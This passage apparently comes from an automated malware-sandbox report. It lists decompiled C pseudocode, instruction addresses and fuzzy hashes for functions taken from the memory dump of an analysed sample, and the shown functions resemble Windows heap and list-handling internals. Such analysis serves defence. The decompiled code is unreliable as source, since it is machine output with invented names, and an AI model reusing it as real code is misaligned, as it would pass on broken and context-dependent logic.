                    0x016a3e2a
                    0x016a3e2f
                    0x016a3e37
                    0x016a3e37
                    0x00000000
                    0x016a3e37
                    0x016a3e31
                    0x00000000
                    0x016a3e31
                    0x016a3e20
                    0x016a3e20
                    0x016a3e35
                    0x00000000
                    0x016a3de9
                    0x016a3de9
                    0x016a3de9
                    0x016a3dee
                    0x016a3dfd
                    0x016a3dff
                    0x016a3e02
                    0x016a3e05
                    0x016a3e05
                    0x00000000
                    0x016a3df0
                    0x016a3de7
                    0x016de78f
                    0x016de794
                    0x016a3d79
                    0x016a3d84
                    0x016a3d89
                    0x016a3d8e
                    0x00000000
                    0x016de7a4
                    0x016a3d96
                    0x016a3d9a
                    0x00000000
                    0x016a3d9a
                    0x00000000
                    0x016de794
                    0x016a3d6e
                    0x016a3d73
                    0x00000000
                    0x016de7b5
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 17cda32bc45fd6a7bff92c62dd61a46f5f06c69448419b45a840dcbded90c502
                    • Instruction ID: bd32183af8b963549c22eacb4f48635067333d53fa1290e1ffe024ff5274e3be
                    • Opcode Fuzzy Hash: 17cda32bc45fd6a7bff92c62dd61a46f5f06c69448419b45a840dcbded90c502
                    • Instruction Fuzzy Hash: 6331BC32A01615DBD7259F2DDC41A7ABBE5FF55700B46806EE949CB360EB30DC41CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169A61C Relevance: .1, Instructions: 106COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E0169A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1740220);
				E016BD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x1757b9c; // 0x0
				_t55 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E016BD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x1757b10 =  *0x1757b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x175536c; // 0x77575368
					if( *_t51 != 0x1755368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x1755368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x175536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0169A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                    0x0169a61c
                    0x0169a61e
                    0x0169a623
                    0x0169a628
                    0x0169a62b
                    0x0169a62d
                    0x0169a648
                    0x0169a64a
                    0x0169a64f
                    0x016d9b44
                    0x0169a6ec
                    0x0169a6f1
                    0x0169a6f1
                    0x0169a655
                    0x0169a657
                    0x0169a65a
                    0x0169a65d
                    0x0169a662
                    0x0169a663
                    0x0169a667
                    0x0169a668
                    0x0169a66d
                    0x0169a706
                    0x0169a706
                    0x016d9bda
                    0x016d9be6
                    0x016d9beb
                    0x00000000
                    0x016d9beb
                    0x0169a679
                    0x016d9b7a
                    0x00000000
                    0x016d9b7a
                    0x0169a683
                    0x0169a6f4
                    0x0169a6f7
                    0x0169a6f9
                    0x0169a6fd
                    0x0169a6a0
                    0x0169a6a0
                    0x0169a6ad
                    0x0169a6af
                    0x0169a6b4
                    0x016d9ba7
                    0x016d9bac
                    0x00000000
                    0x00000000
                    0x016d9bc6
                    0x016d9bce
                    0x016d9bd1
                    0x016d9bd3
                    0x016d9bd3
                    0x00000000
                    0x016d9bd1
                    0x0169a6bd
                    0x0169a6c3
                    0x0169a6c6
                    0x0169a6d2
                    0x0169a701
                    0x0169a704
                    0x00000000
                    0x0169a704
                    0x0169a6d4
                    0x0169a6d6
                    0x0169a6d9
                    0x0169a6db
                    0x0169a6e1
                    0x0169a6e6
                    0x0169a6e8
                    0x0169a6e8
                    0x0169a6ea
                    0x00000000
                    0x0169a6ea
                    0x0169a688
                    0x0169a692
                    0x0169a694
                    0x0169a699
                    0x00000000
                    0x00000000
                    0x0169a69d
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c79b16a3bda12da1d86cdfc9fe59ecce92ccaf7cbd729908bcba1c14c371e67
                    • Instruction ID: 3e5f5bf544087fdc05460dbb5473df0c8ab162ebb7954dec0bcb76956187a6ab
                    • Opcode Fuzzy Hash: 4c79b16a3bda12da1d86cdfc9fe59ecce92ccaf7cbd729908bcba1c14c371e67
                    • Instruction Fuzzy Hash: 0F4179B5A00215DFCF14CF98C890BA9BBF6BB89318F1581ADE905AF344C775A941CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168C182 Relevance: .1, Instructions: 104COMMON
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E0168C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01687D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01738D34(_v8, _t80);
					}
					E01682280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0167FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01738833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0167FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E016AB180();
						if(_a4 != 0) {
							E01682280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0168BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0168BB2D(_t16, _t15);
						E0168B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0167FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0167FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0167FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                    0x0168c18d
                    0x0168c18f
                    0x0168c191
                    0x0168c19b
                    0x0168c1a0
                    0x0168c1d4
                    0x0168c1de
                    0x016d2d6e
                    0x0168c1e4
                    0x0168c1e4
                    0x0168c1e4
                    0x0168c1ec
                    0x016d2d7d
                    0x016d2d7d
                    0x0168c1f3
                    0x0168c1ff
                    0x016d2d88
                    0x016d2d8d
                    0x016d2d94
                    0x016d2d94
                    0x016d2d9f
                    0x016d2da4
                    0x016d2dab
                    0x016d2db0
                    0x016d2db2
                    0x016d2db3
                    0x016d2db4
                    0x016d2dbc
                    0x016d2dc3
                    0x016d2dc3
                    0x0168c205
                    0x0168c205
                    0x0168c208
                    0x0168c20e
                    0x0168c211
                    0x0168c216
                    0x0168c219
                    0x0168c21f
                    0x0168c222
                    0x0168c22c
                    0x0168c234
                    0x0168c23a
                    0x0168c23f
                    0x0168c245
                    0x0168c24b
                    0x0168c251
                    0x0168c25a
                    0x0168c276
                    0x0168c27d
                    0x0168c27d
                    0x0168c25c
                    0x0168c25c
                    0x00000000
                    0x0168c25e
                    0x0168c1a4
                    0x0168c1aa
                    0x0168c1b3
                    0x0168c265
                    0x0168c26c
                    0x0168c26c
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                    • Instruction ID: 8210faa8e7d1f702d3bcd9ed8bd023c14f7a7459e6bc2bf1392c90839c86f388
                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                    • Instruction Fuzzy Hash: 90311472A01587AED705FBB8CC90BE9FB55BF56200F04825ED42C47341DB386A46CBE5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E7016 Relevance: .1, Instructions: 104COMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E016E7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x175d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E016E6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E016E6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01687D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E016A9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E016AB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01684620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                    0x016e7016
                    0x016e701e
                    0x016e702b
                    0x016e7033
                    0x016e7037
                    0x016e703c
                    0x016e703e
                    0x016e7041
                    0x016e7045
                    0x016e704a
                    0x016e7050
                    0x016e7055
                    0x016e705a
                    0x016e7062
                    0x016e7062
                    0x016e705a
                    0x016e7064
                    0x016e7064
                    0x016e7067
                    0x016e7071
                    0x016e7096
                    0x016e709b
                    0x016e70a2
                    0x016e70a6
                    0x016e70a7
                    0x016e70ad
                    0x016e70b3
                    0x016e70b6
                    0x016e70bb
                    0x016e70c3
                    0x016e70c3
                    0x016e70c6
                    0x016e70cd
                    0x016e70dd
                    0x016e70e0
                    0x016e70e2
                    0x016e70e2
                    0x016e70ee
                    0x016e7101
                    0x016e70f0
                    0x016e70f9
                    0x016e70f9
                    0x016e710a
                    0x016e710e
                    0x016e7112
                    0x016e7117
                    0x016e7118
                    0x016e7118
                    0x016e70bb
                    0x016e711d
                    0x016e7123
                    0x016e7131
                    0x016e7131
                    0x016e7136
                    0x016e713d
                    0x016e713e
                    0x016e713f
                    0x016e714a
                    0x016e714a
                    0x016e7084
                    0x016e7088
                    0x00000000
                    0x016e708e
                    0x016e708e
                    0x016e7092
                    0x00000000
                    0x016e7092

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a7e25dee34e01a058393e1581c8809b25a7950b6128534c758c20352ce73d30
                    • Instruction ID: 5edafcd4f7358e09b4d2cd9ecf0548ed471c1e401b778a578760809207243b8d
                    • Opcode Fuzzy Hash: 1a7e25dee34e01a058393e1581c8809b25a7950b6128534c758c20352ce73d30
                    • Instruction Fuzzy Hash: 4A31A2726057519BC320DF68CD44AAAB7E6BF98600F044B2DF99587790E730E914CBE5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01713D40 Relevance: .1, Instructions: 98COMMON
                    Download Yara Rule
                    C-Code - Quality: 70%
                    			E01713D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x175d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E01682280(_t34, 0x1758a6c);
				_t64 =  *0x1755768; // 0x77575768
				if(_t64 != 0x1755768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77575770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E0167FFB0(_t53, _t64, 0x1758a6c);
						 *0x175b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E01682280(_t45, 0x1758a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x1755768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E0167FFB0(_t51, _t64, 0x1758a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E016AB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                    0x01713d40
                    0x01713d48
                    0x01713d52
                    0x01713d59
                    0x01713d5d
                    0x01713d61
                    0x01713d63
                    0x01713d67
                    0x01713d69
                    0x01713d72
                    0x01713d76
                    0x01713d7a
                    0x01713d7f
                    0x01713d8b
                    0x01713d91
                    0x01713d91
                    0x01713d91
                    0x01713d94
                    0x01713d96
                    0x01713d9d
                    0x01713da1
                    0x01713db0
                    0x01713dba
                    0x01713dbc
                    0x01713dbc
                    0x01713dc6
                    0x01713dcb
                    0x01713dcf
                    0x01713dd1
                    0x01713dd4
                    0x00000000
                    0x00000000
                    0x01713dd9
                    0x01713e0c
                    0x01713e0c
                    0x01713e0f
                    0x01713ddb
                    0x01713ddb
                    0x01713de0
                    0x00000000
                    0x01713de2
                    0x01713de2
                    0x01713de4
                    0x01713de8
                    0x01713deb
                    0x01713df1
                    0x00000000
                    0x01713df3
                    0x01713df3
                    0x01713df5
                    0x01713df8
                    0x01713dfa
                    0x00000000
                    0x01713dfa
                    0x01713df1
                    0x01713de0
                    0x01713e11
                    0x01713e11
                    0x00000000
                    0x01713dfe
                    0x01713e04
                    0x01713e06
                    0x00000000
                    0x01713e06
                    0x00000000
                    0x01713e04
                    0x01713d91
                    0x01713e15
                    0x01713e1a
                    0x01713e1f
                    0x01713e1f
                    0x01713e23
                    0x01713e29
                    0x00000000
                    0x00000000
                    0x01713e2e
                    0x00000000
                    0x01713e30
                    0x01713e30
                    0x01713e35
                    0x00000000
                    0x01713e37
                    0x01713e3e
                    0x01713e42
                    0x01713e48
                    0x01713e4e
                    0x00000000
                    0x01713e4e
                    0x01713e35
                    0x00000000
                    0x01713e2e
                    0x01713e5b
                    0x01713e5c
                    0x01713e5d
                    0x01713e68
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fcb9d3497acdb60e1b42610bbcb3fd1224d5a3741be8596a1fe06884545e579f
                    • Instruction ID: 1942f8f64206ed202e2e3d36eecf36a9a2d2487457c87054ca1f6dbfc314ed61
                    • Opcode Fuzzy Hash: fcb9d3497acdb60e1b42610bbcb3fd1224d5a3741be8596a1fe06884545e579f
                    • Instruction Fuzzy Hash: 8C317C71609342CFCB10DF29C99081AFBE1FF89720F4489AEE8989B245D770D908CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169A70E Relevance: .1, Instructions: 96COMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E0169A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1757b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1757b10 = 8;
					 *0x1757b14 = 0x1757b0c;
					 *0x1757b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E0169A990(0x1757b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0169A840(__edx, __ecx, __ecx, _t52, 0x1757b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1757b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1757b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1757b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L01684620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1757b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E016AF3E0(_t50,  *0x1757b14, _t8 >> 3);
						_t28 =  *0x1757b14; // 0x0
						__eflags = _t28 - 0x1757b0c;
						if(_t28 != 0x1757b0c) {
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1757b14 = _t50;
						_t48 = _v12;
						 *0x1757b10 = _t9;
						goto L6;
					}
					 *0x1757b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                    0x0169a713
                    0x0169a714
                    0x0169a717
                    0x0169a71d
                    0x0169a720
                    0x0169a722
                    0x0169a727
                    0x0169a74a
                    0x0169a754
                    0x0169a75e
                    0x0169a768
                    0x0169a76a
                    0x0169a773
                    0x0169a78b
                    0x0169a790
                    0x0169a792
                    0x0169a741
                    0x0169a741
                    0x0169a743
                    0x0169a749
                    0x0169a749
                    0x0169a732
                    0x0169a73a
                    0x0169a797
                    0x0169a79d
                    0x0169a7a3
                    0x0169a7a9
                    0x0169a7b6
                    0x0169a7bc
                    0x0169a7ca
                    0x0169a7e0
                    0x0169a7e2
                    0x0169a7e4
                    0x016d9bf2
                    0x00000000
                    0x016d9bf2
                    0x0169a7ed
                    0x0169a7f2
                    0x0169a800
                    0x0169a805
                    0x0169a80d
                    0x0169a812
                    0x016d9c08
                    0x016d9c08
                    0x0169a818
                    0x0169a81b
                    0x0169a821
                    0x0169a824
                    0x00000000
                    0x0169a824
                    0x0169a7ae
                    0x00000000
                    0x0169a7ae
                    0x0169a73c
                    0x0169a73e
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf73342d3cbb188f0c8b937e421a2652fd77d2082f68169379f4756b55471cf9
                    • Instruction ID: 9461027bc4679d4a37351c45ccba8f57b6d1dda7c163bb1f31be04d205e1aaf1
                    • Opcode Fuzzy Hash: cf73342d3cbb188f0c8b937e421a2652fd77d2082f68169379f4756b55471cf9
                    • Instruction Fuzzy Hash: D731B0B56003019FDB29CF58DC81F29BBFAFB84720F95895AE6158B344D7B19901CBD2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016961A0 Relevance: .1, Instructions: 93COMMON
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E016961A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E01695E50(0x16467cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01739D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0166F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                    0x016961b3
                    0x016961b5
                    0x016961bd
                    0x016961c3
                    0x016961c7
                    0x016961d2
                    0x016961ff
                    0x016961ff
                    0x01696201
                    0x01696207
                    0x01696207
                    0x016961d4
                    0x016961d9
                    0x00000000
                    0x00000000
                    0x016961df
                    0x016961e2
                    0x00000000
                    0x00000000
                    0x016961e6
                    0x016961e8
                    0x016961ee
                    0x016961ee
                    0x016961f9
                    0x016d762f
                    0x016d7632
                    0x016d7635
                    0x016d7639
                    0x016d7640
                    0x016d766e
                    0x016d7675
                    0x00000000
                    0x00000000
                    0x016d7681
                    0x016d7689
                    0x016d768d
                    0x016d7691
